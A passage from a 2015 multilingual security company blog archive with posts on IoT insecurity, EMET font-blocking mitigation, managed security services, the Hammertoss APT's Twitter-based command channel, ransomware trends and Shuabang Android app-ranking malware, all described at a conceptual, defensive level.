apks related, may guide us to a more accurate attribution. Although hereby we briefly describe our research, the complete analysis process may be found here. About the Relations between NGE MOBI/XINYINHE, "GHOST PUSH" and KEMOGE and OPDA malicious adware. from ElevenPaths
21 de octubre de 2015
New "Insecurity in the Internet of Things" report
New Insecurity in the IoT report You can now download the full report about Insecurity in the Internet of Things carried out by ElevenPaths' Analyst Team. It`s available at ElevenPaths web. Summary In the past six months potential insecurity within the Internet of Things (IoT) has been regularly making news headlines, from hacking planes, cars, or baby monitors, to Smart TV’s insidiously listening to and broadcasting unencrypted conversations across the internet. A September advisory issued by the FBI indicated that they too had concerns over inherent security flaws in the implementation of the IoT and warned over the potential opportunity offered to cyber criminals. While to many such a warning may seem premature given the current market penetration, the IoT is currently at a peak of expectation and anticipation, essential to driving the concept forward. In enterprise the IoT is seen as an integral part of the blueprint for developing from the digital business model of today to the digitisation of the entire value chain, and in the consumer space ‘wearable’ adoption is rising rapidly. However advances in edge computing, networks, big data and analytics are still required for this truly disruptive technology to shape the future; and although widespread implementation is likely to be 5-10 years away, not addressing security flaws now will only compound the problem for an IoT connected world. Such scope ensures that IoT should not be thought of as just a ‘Thing’ in itself; it is a collection of technologies integrated and presented to provide specific and vastly diverse applications. However in terms of manufacturing, a rapid development lifecycle is producing devices that are ‘always-online’ and often possess inherent restrictions on security measures due to size and cost; research that has indicated that as many as 70% of commonly used IoT devices contain significant vulnerabilities. Although maintaining consumer trust, regulating the quantity and nature of data to be collected and transmitted, and also tackling end-user behavioural traits likewise provide complex challenges. At this nascent stage in the lifecycle, focus on securing it is often disproportionately weighted on the end device, forgetting that it is merely a component of a larger eco-system that is only as strong as its weakest link. Methods to subvert these technologies will depend both on the manner in which they mature, and how security is implemented on often exposed devices. Worryingly, the early indications are that the network, application and cloud security lessons of the past 20 years have often been forgotten by existing technology vendors, and not yet learnt by manufacturers pushing into a new market. While risk exposure from IoT vectors is likely to remain low in the short term for most enterprises, but risk assessments may prove it is higher than first thought. The uptick in reflective DDoS attacks in H2 2014 and composition of the ‘Lizard Stresser’ botnet already points towards the effect of an insecure IoT being maliciously re-purposed. Unanticipated information leakage from the extended IoT ecosystem may also compound the problem of data aggregation from both consumer and enterprise sources, enabling cyber criminals to unite disparate data sets for a wide range of malicious goals. The concept of security by design must be given a higher priority in order to avoid security flaws being compounded as the IoT matures, and adopters should be alert to IoT integration in a less mature, loosely regulated environment, or risk costs spiralling later. Core principles of data, application, network, systems and hardware security remain applicable but the complexity is higher and measures must be more careful not to work against the user. The IoT will be transformational, disruptive technological movement, but carries a spectrum of risks that affect more than just the IT department. Download the full report carried out by ElevenPaths'Analyst Team More info about our Security Trends Reports at www.elevenpaths.com ElevenPaths' Analyst Team
14 de octubre de 2015
EMET 5.5 incluye la posibilidad de bloquear la carga de fuentes. Cómo y por qué es útil
EMET ha sacado la beta de su versión 5.5 con dos importantes mejoras. Una que acelera su integración con el directorio activo (en forma de exportación de políticas de grupo) y otra que pretende erradicar de raíz un grave problema que arrastra Windows desde hace años: los ataques y elevaciones de privilegios a través de la carga Fonts (tipos de letra). La última "gran novedad" de EMET fue el ASR o "Attack Surface Reduction" del que ya hablamos en otra entrada. Resultaba una aproximación de lo más interesante (por su radicalidad) contra la carga de módulos no deseados en procesos. Ahora, la versión 5.5 trae algunas mejoras menores, pero sobre todo, la posibilidad de evitar la carga de fuentes no confiables. En realidad, esto no es del todo cierto. Esta funcionalidad ya estaba presente en el registro desde que aparición Windows 10, pero EMET le aporta facilidad de uso y una interfaz más sencilla. ¿Y por qué es importante? Desde que Windows decidió (cuando escaseaban los recursos) integrar algunas partes de su interfaz en el kernel, muchas funciones gráficas suponen un riesgo adicional. Desde entonces, son cientos las vulnerabilidades que han permitido elevar privilegios cargando fuentes mal formadas, debido a algún fallo al ser procesadas con el Graphics Device Interface (GDI). Esto permitía que, aunque se abriese un documento o se navegara a veces con los mínimos privilegios, al procesar una nueva fuente y aprovechando una vulnerabilidad, se llegase a ejecutar código con mayores privilegios. La nueva funcionalidad de bloqueo de fuentes no confiables, puesta en modo "auditoría" Esta aproximación introducida en Windows 10 (y solo para ese sistema), permite bloquear la carga de fuentes que no estén ya en el directorio de sistema %windir%/Fonts. Se bloquea todo por defecto, y luego se permite crear excepciones por programa. Atención: No impide la instalación de fuentes en el sistema, sino su carga desde directorios diferentes al oficial (donde ya se necesitan permisos de administrador para haber instalado fuentes). En realidad, como decía, esta funcionalidad fue introducida en Windows 10, con la posibilidad de modificar el valor de la máscara "MitigationOptions" aquí HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerKernelMitigationOptions. También es posible hacerlo a través de las políticas de grupo, en gpedit.msc. Bloqueo de fuentes en Windows 10 a través de las políticas de grupo Para crear excepciones por programa, en principio y según la documentación, basta con crear la rama correspondiente al binario en HKEY_LOCAL_MACHINE SoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options. No olvidemos reiniciar tras cada cambio. ¿Cómo funciona por dentro? En principio, a través de la funcionalidad descrita, se permite activar globalmente el sistema de bloqueo, y selectivamente permitir que ciertos programas que puedan tener problemas, queden "exentos". Con EMET queda un poco confuso, porque aunque se active la funcionalidad "Always on", no se activa visiblemente para el resto de programas en la lista de monitorizados por EMET, quedando todos a "Off". Así, da la impresión de que con EMET se puede activar selectivamente la funcionalidad para ciertos programas, y no es así. Aunque la funcionalidad esté "Always on", no aparece marcada en la columna correspondiente a cada programa protegido Si comprobamos qué cambia en el registro cuando se activa la funcionalidad de bloqueo de fuentes para una aplicación concreta, se observa un cambio en el registro. Hasta ahora, el MitigationOptions de cada proceso estaba destinado a mitigar ataques SeHOP, mejorar el ASLR... Con EMET, activar la opción de bloqueo de fuentes hace que el valor MitigationOptions tome el valor 5000000000050, y al desactivarlo, pasa a 6000000000050. Algo que no parece estar documentado. Según se cambie la configuración para un proceso concreto, el valor MitigationOptions para ese proceso en concreto, cambiará Un pequeño ejemplo Este programa, es un simple ejecutable que carga un tipo de letra "Prince Valiant" alojado en el escritorio, y no en el el directorio oficial. Ejemplo de programa que carga fuente desde un punto diferente al repositorio oficial de fuentes instaladas de Windows Sin esta mitigación, el funcionamiento es el siguiente. Un simple programa que muestra un tipo de letra, y Windows también en los iconos de los ficheros de las propias fuentes Ahora, le hemos indicado a EMET que paralice la carga de fuentes que no estén instaladas. Con la mitigación en marcha, se observa que el simple formulario no es capaz de mostrar el tipo de letra, ni tampoco los iconos del escritorio. Además todo queda registrado en el visualizador de eventos. El sistema ha bloqueado la carga de fuentes Un ejemplo más de que EMET está aglutinando todos los métodos radicales ( y por tanto, eficaces) de prevención de explotación de vulnerabilidades en Windows, integrando un sistema de protección en un solo punto, cada vez más útil, sencillo y eficaz. Sergio de los Santos ssantos@11paths.com @ssantosv
6 de octubre de 2015
¿Me va a creer usted a mí o a sus propios ojos? El dilema de la seguridad gestionada
Las organizaciones se enfrentan a un contexto de amenazas informáticas cada día más complejo que pone en riesgo el normal desarrollo de los procesos productivos. Nos referimos a ataques avanzados persistentes, amenazas de día cero, espionaje industrial, hacktivismo… y al mismo tiempo la necesidad de cumplir con «las reglas del juego» (legislación y regulaciones) en materia de seguridad. El reto para las organizaciones es equilibrar las exigentes demandas de los procesos productivos y la gestión de la creciente complejidad de las amenazas, haciéndolo con la inteligencia y escala requerida en cada caso. Esto obliga no sólo al despliegue de herramientas que permitan gestionar estas amenazas, sino también a disponer de profesionales expertos en seguridad o bien externalizar este servicio a terceros especializados, que dispongan del personal capacitado y las herramientas adecuadas para la gestión de su seguridad. El problema en este caso es que la organización pierde visibilidad y control sobre su propia seguridad. En ElevenPaths consideramos que es posible ir un paso más allá en este eterno juego del gato y el ratón. La gestión “tradicional” de la seguridad externalizada se basa en la operación de herramientas de seguridad como cortafuegos, antivirus, detectores de intrusiones, etc. y de un SIEM como herramienta de recolección y correlación de los eventos que generan esas herramientas de seguridad. El SIEM detecta y avisa al operador cuando se produce algún incidente de seguridad, pero la organización pierde visibilidad de su propia seguridad e inmediatez a la hora de responder. El nuevo enfoque de la gestión externalizada de la seguridad debería permitir a la organización tener un conocimiento inmediato de los incidentes, así como una visión unificada de su seguridad, que permita una respuesta también inmediata y a la escala de la amenaza, que minimice el impacto en el negocio. Esta solución además debería integrar tanto la información obtenida de todas las herramientas desplegadas en la propia organización, como la información externa a la misma. Así mismo, la organización debería beneficiarse de un conocimiento global y colectivo que le permita anticipar incidentes que ya le están ocurriendo o le han ocurrido a otros. El primer paso es mejorar la detección de incidentes que realizan los SIEMs. SandaS procesa la información que reciben los SIEMs con un conjunto de algoritmos propios que permiten detectar actividades que pueden pasar desapercibidas para estos. El portal de última generación permite a la organización la visualización en tiempo real de la información relevante de su seguridad, y hacer un seguimiento minuto a minuto del estado de su seguridad y de cómo se está gestionando la misma. No es suficiente con detectar un incidente, sino que es necesario categorizarlo de una forma homogénea y asignarle una criticidad. SandaS permite personalizar el nivel de criticidad según el contexto específico de la organización y los elementos a los que afecta. Además, notifica de forma automática a los actores relevantes en ese contexto, para un tratamiento y resolución más ágil y eficiente. Incluso puede ejecutar automáticamente acciones de resolución o remediación, lo que permite optimizar recursos. SandaS se apoya en múltiples componentes de la plataforma de seguridad de ElevenPaths, como es el framework de procesamiento Big Data Sinfonier que le permite la integración de fuentes internas y externas, como eventos externos detectados por otros servicios de ciberseguridad. Esto permite detectar más rápidamente, y de forma más ajustada al contexto de la organización, posibles incidentes y prevenir o reducir su impacto. Además, la cualidad más innovadora de SandaS es su enfoque colaborativo. Gracias a su escala global y el gran volumen de datos que maneja de muy diversas fuentes, obtiene un conocimiento global de indicios sospechosos en toda su red de actuación. Esta inteligencia le permite inferir amenazas potenciales, detectar inmediatamente incidentes que ya están ocurriendo y, sobre todo, prevenir que estos incidentes ocurran en aquellas organizaciones donde aún no se han materializado. Para completar esta visión de la gestión de la seguridad sería necesario vincularla al negocio. Es necesario valorar el riesgo que suponen amenazas y vulnerabilidades para el negocio, así como ser capaces de gestionar el cumplimiento de las múltiples regulaciones, normativas y políticas. Esto nos permite tomar mejores decisiones sobre la gestión de los incidentes y la definición de procesos, procedimientos y políticas para prevenir y gestionar incidentes. Por ello, recientemente hemos ampliado nuestra solución con capacidades de GRC (Governance, Risk and Compliance) a través de la adquisición de la plataforma GesConsultor, que se integra en nuestra familia de productos como SandaS GRC.
15 de septiembre de 2015
ElevenPaths compra Gesconsultor (Gesdatos), la plataforma líder en España en sistemas de gestión y cumplimiento normativo
ElevenPaths, la empresa especializada en el desarrollo de innovadoras soluciones de seguridad de Telefónica, ha adquirido la solución tecnológica GesConsultor (incluyendo su módulo de privacidad Gesdatos), la plataforma líder en España para Sistemas de Gestión y Cumplimiento Normativo (GRC- Governance, Risk & Compliance-), que gestiona de forma unificada y eficiente los requisitos legales, de seguridad y riesgos de una organización, integrando y orquestando sus procesos clave en torno a tres dominios estratégicos: Gobierno Corporativo, Gestión del Riesgo y Cumplimiento Regulatorio. ElevenPaths integrará GesConsultor en su portfolio de soluciones de Seguridad Gestionada enriqueciéndolo. De esta forma ofrecerá una solución de tecnología propia en el área de GRC de alto potencial de crecimiento y que antes cubría con soluciones de terceros. Para ello, ha incorporado a su plantilla al equipo de desarrollo de la solución. Esta solución se comercializará como parte de la oferta de seguridad de Telefonica en todas las operadoras locales de la compañía y a través del Distribuidor Premium, Govertis (nueva marca de la empresa creadora de la plataforma GesConsultor), junto con servicios especializados en el despliegue de la solución de forma totalmente alineada con estándares y las mejores prácticas internacionales. Actualmente hay más de 10.000 organizaciones gestionadas a través de la plataforma de Cumplimiento Normativo y más de 180 partners asociados utilizando la solución. Se encuentra ampliamente implantada en España y ya ha iniciado la expansión en Latam. La solución ayuda a las organizaciones del sector privado y público, que se enfrentan hoy en día a enormes retos mientras ejecutan sus procesos productivos y de soporte. Deben velar por su seguridad y gestionar adecuadamente el riesgo, cumplir con las políticas internas internas y las obligaciones que les son impuestas por legisladores, reguladores y clientes, y orientar toda la organización a alcanzar los objetivos establecidos. Esto obliga al despliegue de herramientas que permitan gestionar estas necesidades y a disponer de profesionales expertos que las conviertan en transformadoras para la organización. La solución proporciona las siguientes funcionalidades de alto nivel: Modelado de arquitectura empresarial, para reflejar la organización de forma fiel, al nivel de detalle requerido para la Gestión del Riesgo y Cumplimiento Normativo, detallando para los Servicios y Procesos de Negocio las estructuras organizativas, Sistemas de Información y la Infraestructura requerida para su operación. Centralización de la información de cumplimiento normativo, gestionando los controles derivados de múltiples Fuentes de Requisitos: Legislativos (LOPD, ENS, ENI, Infraestructuras Críticas,…), estándares internacionales (ISO 27001, ISO 27002, ISO 20000, ISO 22301, PCI-DSS,…), así como marcos regulatorios sectoriales o propios de la organización. Gestión de riesgo, incorporando un motor del Riesgo basado en ISO 31000 con pleno soporte a marcos como ISO 27005, NIST SP 800-30 o COBIT 5 for Risk. Adicionalmente, dispone de un módulo específico para MAGERIT con soporte al Esquema Nacional de Seguridad y la legislación sobre Infraestructuras Críticas basado en PILAR. ElevenPaths amplía su solución con capacidades de GRC a través de esta adquisición, que se integra en su familia de productos como SandaS GRC. » Descargar nota de prensa
14 de septiembre de 2015
Hammertoss, APT que usa esteganografía y Twitter para recibir comandos
Como en tiempos de la guerra fría los objetivos se repiten, pero los escenarios cambian. Ya no es tan necesario desplazar agentes secretos a otros países, falsificar pasaportes o disfrazarse para no ser reconocido. Ya no hay que jugarse el pellejo colándose en la noche esquivando sistemas de alarma y seguridad en la sede presidencial o alguna empresa tecnológica para robar documentos. No solo la guerra se libra en internet, sino en sus aspectos más "2.0". Twitter y esteganografía son dos puntos básicos de un grupo de atacantes especializados, llamados APT29 por FireEye. En un informe publicado por FireEye se detalla el funcionamiento de Hammertoss. Se trata de la herramienta de comunicación y robo de información creada por el grupo que han denominado APT29 y con objetivos de espionaje muy concreto. Se cree que el grupo está siendo financiado por el propio gobierno ruso y sorprende su capacidad de transformación y ofuscación, que le permiten innovar sus estrategias sobre la marcha una vez son detectados. Esquema de funcionamiento de Hammertoss Twitter como un DGA Conficker popularizó una técnica que se sigue usando hoy en día. En vez de incrustar en el código del malware los dominios de sus C&C (dónde tenía que conectarse para recibir instrucciones o dejar datos), lo que hacían eran generarlos dinámicamente, con un algoritmo de generación de dominios (DGA). Según el día, la hora u otros parámetros, eran capaces de generar miles de dominios al día. El malware intentaba conectar con solo un subconjunto, y el atacante registraba según el día (porque conocía el algoritmo y los resultados que arrojaría) unos pocos dominios de los posibles generados. Esto tenía el siguiente efecto: Analizar el malware era mucho más complicado. Nunca se sabía dónde se conectaría el malware para recibir o dejar información. Con pocos registros, el atacante conseguía una buena tasa de "acierto" de dominios, y esto actualizaba el malware con nuevos algoritmos de dominio a su vez, lo que convertían a la botnet en algo muy complejo de seguir o detener, puesto que nunca se sabía exactamente dónde estarían los C&C. En el caso de APT29 han optado por un sistema parecido pero basado en Twitter. De forma que se crean perfiles de twitter basados en fecha y otros parámetros. Por ejemplo, con la base 123Bob456, donde los tres y últimos números están basados en la fecha. El atacante registraría el perfil de twitter y ahí dejaría instrucciones para el malware en forma de Twit con una URL y un hashtag. La URL del twit contenía imágenes con información codificada (esteganografía) y además cifrada en su interior. El hashtag le servía al malware para conocer en qué punto se encontraba esa información dentro del archivo de imagen. Extrayendo información de la cuenta de Twitter generada para la ocasión Una vez descargada la imagen y localizado el código, se descifran las instrucciones y se ejecutan. Entre estas instrucciones se encuntra la de crear un repositorio en la nube con credenciales de acceso y posteriormente ir recopilando los datos almacenados de la víctima e ir depositándolos allí. Antonio Bordón antonio.bordon@11paths.com
5 de agosto de 2015
Trend Report Ransomware em português
Extorsão no século XXI O flagelo do malware cripto-ransomware ganhou destaque nas previsões de ameaças de 2015 e o aumento de 165% observado no primeiro trimestre de 2015 indica que tais medos estavam bem fundamentados. Por meio de um modelo criminoso que vai de encontro a muitas das previsões de ameaça, o cripto-ransomware não tem relação com a extração de dados valiosos, ao invés disso utiliza da criptografia de arquivos, para posteriormente solicitar um resgate, a extorsão ocorre de forma agressiva. Ainda que a primeira vista a técnica possa parecer precária, a evolução do cripto-ransomware e do mercado criminoso que serve como incubadora é, na verdade, uma operação calculada que abusa das tecnologias defendidas por defensores da privacidade. As estatísticas de propagação das variantes CTB-Locker ilustram bem a difusão geográfica generalizada dessa ameaça subversiva ao longo de 2015. O vetor de infecção utilizado pelos criminosos para propagar cripto-ransomwares varia, sendo muitas vezes simbiótico com infecções de malware anteriores; em 2014, isso seria geralmente o resultado da botnet Gameover Zeus,, em 2015, houve um crescimento do ransomware como parte do ciclo de vida de um malware que engloba "fraudes de cliques" e "publicidade maliciosa" ("malvertising"). Uma vez infectado, a técnica de criptografia assimétrica é utilizada pelo malware para criar um par de chaves pública-privada para criptografar arquivos. A chave utilizada para codificar os arquivos muitas vezes também é criptografada por meio de um processo que utiliza uma combinação de criptografias RSA e AES, sendo que, sem acesso à chave privada do agressor, é praticamente impossível decriptar os dados. Com o passar do tempo, o preço do pedido de resgate foi ajustado pelos criminosos e, atualmente, está na faixa de $400 (€360), a serem pagos em Bitcoins, o que parece se aproximar do teto no qual ransomwares sem alvo conseguem achar um ponto de equilíbrio entre a probabilidade de pagamento e o pedido de resgate máximo por parte de um usuário comum. Entretanto, em junho de 2015, o FBI emitiu uma declaração de que a variável CryptoWall havia causado danos no total de $18 milhões de dólares, incluindo pagamentos de resgates de $200 a $10.000 dólares, tanto de indivíduos quanto de empresas. O cripto-ransomware sintetiza o vínculo entre o criminoso cibernético moderno e o uso eficaz da velha intimidação psicológica, sendo um modelo que parece ser escalável a tecnologias como smartphone, nuvem e Internet das coisas, IoT. Na verdade o potencial de evolução dessa ameaça, alimentada pelo ecossistema de criminosos cibernéticos, pode ser mais sinistro do que ver as estatísticas de propagação. Codificação de erros e apreensões pela aplicação da lei relativa às variantes específicas pode oferecer uma oportunidade de descriptografia em uma pequena porcentagem de casos, mas uma 'cura' deve ser considerada como inexistente. Os criminosos podem nem sequer pretende fornecer descriptografia, mas a trajetória do ransomware é testamento para o número de vítimas despreparados, que sentiu que não tinham outra escolha. A única forma de anular o modelo comercial criminoso é não pagar o resgate;. No entanto, esse tipo de idealismo não serve para um indivíduo ou empresa infectado que não possuem medidas de proteção suficiente. Conscientização de segurança e “fortalecimento”, hardening, do ambiente tecnológico são medidas de prevenção, mas a única contingência confiável em casos de infecção é ter backups suficientes; idealmente, três cópias em dois formatos diferentes, além de uma cópia offline. Erros de codificação e apreensões por determinação judicial podem oferecer uma chance de decriptação em uma pequena percentagem dos casos, embora seja necessário considerar que não existe uma "cura". Pode ser que os criminosos nunca pretendam oferecer decriptação, mas a trajetória do ransomware é uma prova da quantidade de vítimas despreparadas que não tinham outra opção. » Download do "Cyber Security Pulse and Ransomware report" em português Original article by Ben Walton ben.walton@11paths.com Text adapted into Portuguese by Leandro Bennaton leandro.bennaton@11paths.com
31 de julio de 2015
Dime a qué te dedicas y te diré de qué protegerte en la red
Del mismo modo que el mundo tecnológico y el ciberespacio han ido evolucionando a pasos agigantados, también lo han hecho las ciberamenazas. Las compañías tienen que hacer frente a una gran variedad de ellas procedentes de diferentes actores: organizaciones cibercriminales dedicadas al fraude en internet, grupos hacktivistas y activistas que actúan en contra de los intereses de las empresas, competidores que intentan obtener ventajas competitivas ilegalmente o incluso estados que tratan de defender sus propios intereses nacionales. Nos encontramos ante un escenario complejo en el que la seguridad demanda nuevos planteamientos. Ya no es suficiente gestionar las vulnerabilidades y riesgos de los sistemas de información internos sino que es también necesario tener conocimiento y control de las amenazas externas que nos afectan. Los incidentes, con alto impacto reputacional y económico, suceden de manera habitual ocasionados principalmente por el cambio constante de las tácticas y motivaciones de los atacantes. Es en este punto donde la inteligencia juega un papel fundamental para las empresas. Telefónica, como proveedor líder en servicios de Ciberseguridad para empresas, ayuda a detectar de manera temprana actividades sospechosas que amenazan al negocio de sus clientes. Para ello, Telefónica ofrece el servicio de Vigilancia Digital dedicado a la monitorización de la red las 24 horas del día para conocer la exposición de sus clientes en el mundo digital e identificar las amenazas y riesgos relacionados con su Reputación y Marca, su Disrupción del Negocio y el Fraude Online. El servicio Vigilancia Digital de Telefónica se encuadra en el concepto de Threat Intelligence definido por Gartner, basado en el conocimiento a través de evidencias que incluyen el contexto, los mecanismos, los indicadores, las implicaciones y el asesoramiento necesario acerca de amenazas y riesgos actuales o emergentes sobre los activos de sus clientes, proporcionándoles toda la información necesaria para facilitar la gestión, priorización y respuesta de aquellas amenazas con más riesgo de impacto en su negocio. Sólo durante el año 2014, el servicio de Vigilancia Digital de Telefónica detectó más de 28.000 amenazas directas a clientes de varios sectores. El número de casos identificados variaron en función del sector económico al que pertenecen, siendo los más castigados los clientes pertenecientes a los sectores de “Banca y seguros”, “Industria y Energía” y “Retail”, respectivamente. En concreto, se detectaron más de 1.350 incidentes de media en los clientes del sector de Banca y seguros, 1.200 incidentes de media por empresa del sector Energía e Industria, así como una media de 850 casos para las empresas de Retail. En general, destacan los incidentes relacionados con el robo de credenciales y las fugas de información corporativa, que han revelado la publicación no autorizada de información de alto impacto para nuestros clientes que derivaron en accesos no autorizados a sistemas, instalaciones o procesos de la compañía. Seguidamente, las amenazas que más se repitieron son: Amenazas de tipo malware relacionadas directamente con entidades del cliente. A continuación, se encuentran aquellas relacionadas con la detección de nuevas vulnerabilidades que afectan a sus activos. En tercer lugar aparece la anticipación de operaciones hacktivistas, activistas y de DDoS cuyo principal objetivo es atacar los intereses de la compañía, ya sea contra sistemas y activos físicos, contra la imagen de la empresa o contra los activos tecnológicos de la organización. Les siguen las amenazas relacionadas con contenidos ofensivos que menoscaban la imagen y reputación de las empresas. Para finalizar se encuentra el phishing y dominios sospechosos como amenazas con gran volumen entre nuestros clientes. En este sentido, centrándonos en las amenazas más comunes según el sector de actividad de nuestros clientes y según su volumen de aparición, tenemos: En Banca y seguros destacan el malware, phishing, hacktivismo, activismo y detección de DDoS, contenidos ofensivos, uso no autorizado de la marca y la aparición de aplicaciones móviles sospechosas, especialmente aquellas que suplantan la imagen de los clientes con el objetivo de engañar al usuario final, robo de credenciales y carding. En Industria y Energía, las amenazas más destacables son las relacionadas con la vulneración de mecanismos de seguridad, hacktivismo, activismo y detección de DDoS, contenidos ofensivos, dominios sospechosos, fugas de información, robo de credenciales y el uso no autorizado de marca. EnRetail, destacan la vulneración de mecanismos de seguridad, contenidos ofensivos, hacktivismo, activismo y detección de DDoS, dominios sospechosos, fugas de información, el uso no autorizado de la marca, así como el rodo identidad digital y counterfeit. No cabe duda que la detección temprana de estas amenazas, sea cual sea el sector de actividad de la empresa, es un requisito indispensable para la aplicación de contramedidas eficaces para minimizar el impacto en el negocio de las compañías. Para ello, las empresas deben tener la capacidad de entender los comportamientos de los atacantes, sus recursos y sus motivaciones, manejando la información necesaria que le ayude a coordinar una respuesta apropiada y anticipar amenazas similares en un futuro. Es ahí donde la capacidad de Threat Intelligence de Telefónica ofrece el mayor valor a sus clientes: Ir más allá de la simple recopilación de información, siendo capaces de crear valor añadido a través del procesado y clasificación de la misma usando nuestra propia tecnología. Entender la forma en que los atacantes operan y ser capaces de adelantarnos a futuras versiones de los ataques. Anticiparnos, identificando las amenazas, así como los factores desencadenantes de las actuaciones maliciosas, recomendando contramedidas y respuestas frente a éstas, a través de la definición de estrategias de seguridad adecuadas. Con este fin, el servicio Vigilancia Digital de Telefónica detecta, clasifica y valora el riesgo de cada una de las amenazas que atentan contra sus clientes, proporcionándoles: Detección temprana de amenazas de ciberseguridad las 24 horas del día, los 365 días del año. Un equipo de expertos y analistas de ciberseguridad distribuido a nivel internacional que, que de forma proactiva, detectan comportamientos maliciosos, implementando técnicas únicas de incorporación de información de ciberinteligencia desde múltiples fuentes de información. Tecnologías propietarias como Tacyt, Sinfonier o JetSetMe desarrolladas e implementadas en base a nuestro expertise acumulado y necesidades de los clientes en el ámbito de la Ciberseguridad a lo largo de los últimos años, hacen único el servicio ofrecido por Telefónica. Todo ello operado y gestionado desde el Global Cybersecurity Center de Telefónica situado en Madrid (España) y apoyado por el Global Security Center y la red global de SOCs y CyberSOCs de Telefónica. Ester Bermejo ester.bermejo@11paths.com Yaiza Rubio yaiza.rubiovinuela@cybersecurity.telefonica.com
30 de julio de 2015
Trend Ransomware Report
21st Century Extortion The scourge of crypto-ransomware malware featured prominently in threat predictions for 2015, and the 165% increase reported in Q1 2015 indicate that these fears were well founded. Using a criminal model that runs counter to many of the others included in the threat predictions, crypto-ransomware is not concerned with exfiltrating valuable data, instead surreptitiously encrypting files to subsequently employ an abrupt, confrontational extortion demand. While on the surface the technique may seem crude, the evolution of crypto-ransomware and the criminal marketplace which has served as its incubator, it is actually a calculated operation, abusing technologies long upheld by privacy advocates. The propagation statistics of the CTB-Locker variant are broadly illustrative of the overall geographic spread of this subversive threat to date during 2015. The infection vector criminals use to distribute crypto-ransomware varies, and is often symbiotic with prior malware infections; during 2014 it would often be a result of the Gameover Zeus botnet, and 2015 has seen an increase in ransomware as part of a malware lifecycle encompassing ‘click fraud’ and ‘malvertising’. Once infected, asymmetric encryption is employed to create a public-private key pair for the malware to encrypt files. The key used to encrypt the files is often itself encrypted again, in a process often using a combination of RSA and AES cryptography, and ultimately without access to the attacker’s private key it is next to impossible to decrypt the data. Over time the price point of the ransom demand has been adjusted by criminals, and is now commonly around $400 (€360) to be paid in Bitcoin, which appears to be close to the price ceiling at which untargeted ransomware balances likelihood of payment with the maximum ransom demand from an average user. However in June 2015 the FBI issued an advisory stating the CryptoWall variant had caused $18 million in damages including ransom payments of $200-$10,000 from both individuals and businesses. Crypto-ransomware epitomises the nexus between the modern cyber-criminal and effective use of age-old psychological intimidation, and is a model that appears to scale well to technologies like mobile, cloud and IoT. Indeed the potential for this threat to develop further, nurtured within the cyber-criminal ecosystem is perhaps more sinister than viewing propagation statistics alone. The only way to nullify the criminal business model is if no-one paid a ransom; however such idealism is of no compensation to an individual or business who have been infected and lack sufficient safeguards. Security awareness and system hardening are preventative measures, but the only contingency to rely on should infection occur is to have sufficient backups; ideally three copies, in two different formats, with one stored offline. Coding errors and seizures by law enforcement relating to specific variants may offer a chance of decryption in a small percentage of cases, but a ‘cure’ should be regarded as non-existent. The criminals may never even intend to provide decryption, but the trajectory of ransomware is testament to the number of unprepared victims who felt they had no other choice. » Download the "Cyber Security Pulse and Ransomware report" Ben Walton ben.walton@11paths.com
29 de julio de 2015
Top of the app charts. Shuabang: automated malware made in China
Have you ever wondered how some apps rocket up the charts so quickly? Sometimes you’ll spot one that seems like a curveball, like a pub rock covers band hitting number one in the download charts. At the Barcelona eCrime symposium ElevenPaths presented some new thinking on new Android malware trend called "Shaubang" – a term used in China to describe the shady methods whereby certain apps are being "gamed" in app stores to get them to the top of charts. Get downloading – a whole industry in China "Shuabang" is to app markets what "Black SEO" is to search engines and is sold as a service sometimes for a few hundred or thousands of dollars. http://www.theverge.com/2015/2/12/8024861/top-10-app-store-manipulation-photo This image of a factory line process, with workers employed solely to download apps to boost their ranking, was picked up widely in the media earlier in the year. But there’s a stumbling block to the number of downloads you can get… Google accounts. In Google Play a Gmail account is needed to download an app. Moreover, you not only need a Gmail account (that requires CAPTCHA authentication) but you need this account to be associated with a device ID. But to get their fake download rate up, companies would need thousands of registered accounts. There’s only so many people you can employ to hit download all day and that isn’t exactly an efficient way to run a business. This brings us to the question – "where can we get the other thousands of accounts?" It’s possible to steal them or buy them in the black market but that carries all sorts of risks. Then, of course, there’s always malware – a malicious program that can do much of the heavy lifting for you by infecting numerous devices. There’s already services in China that can break CAPTCHAs, but device IDs, which are harder to get, are also required for downloading. You can’t just invent device IDs either, as Google will spot them and ban the account from the outset taking you back to square one. The big (Shua)bang What Eleven Paths found (thanks to Tacyt) was a new kind of malware spread via Google Play that associated fake accounts with existing device IDs. People infected with the malware were unknowingly giving away their own device’s ID to the malware creators, which were then associated with these fake Gmail accounts. The attacker created more than 12,000 Gmail accounts and made them available to malware providers via simple web requests. They then created a malicious app that sent a request for a Gmail account every ten minutes in the attackers’ server. The program then simulated the whole registry process against Google services – thereby creating a new, seemingly human, profile. With this the attacker had all they needed to automate the Shuabang system. These apps were disguised as downloads and spread in Google Play between September and November 2014, getting millions of downloads in the process. Users who thought they were downloading a wallpaper, for example, were actually feeding this army of fake accounts for a Shuabang company. Steal, buy or... do it yourself with malware ElevenPaths found and alerted Google about these apps, which were then removed. The team studied them and even had access to attackers servers. The apps showed a reversing of how Android worked during the account registering process. The server got millions of hits with results fuelling the 12,000 registered accounts over millions of innocent devices. Victim’s real accounts were not compromised, but the harm for them came in consumed traffic and the potential that their device ID could be banned for fraudulent use. The attacker created a whole system connected to a "legal" company in China that offered "positioning services" for Android apps. New malware methods This attack was extremely interesting, not only for the code of the malware itself, but because they managed to fool Google Play by uploading these apps hundreds of times. Antiviruses were not aware of the attack until ElevenPaths told them, and they had to invent a new variant of malware to find them. But the work did not stop there. ElevenPaths has been following the gang since the apps were removed and got to know about their new plans. They have found new malware that does not just associate an account with a device ID, but creates the Gmail account from scratch, although it’s not believed this particular malware has spread yet. This time the new malware does not get assigned Gmail accounts but, using data from the attackers server, asks Google to create the Gmail account, sends the CAPTCHA to this service, breaks it and associates the device ID... all without the victim noticing anything. What can the user do? Common sense is always the best policy. It’s still very unusual for malware to take advantage of Android vulnerabilities so wider prevention is all about making users aware that they have to physically install the malware themselves. We’d recommend that people whitelist their apps, so they only install the most reputed programs. Here’s a couple of tips to make sure you don’t become a victim: Never install apps from outside Google Play, or markets you really trust. If in doubt, research the developer. Never trust very "new" apps. Wait until they’ve been around few months and had a few thousands downloads. Ban apps you do not feel comfortable with. If an app requires too many permissions, downloading it is probably a bad idea. Use an antivirus on your phone So next time you see an app that’s simply too good to be true, the chances are it probably is. Prevention is always the best cure, so exercise due caution and don’t let the Shaubangers get the better of you. * A version of this article has originally been published by SCMagazine, here.
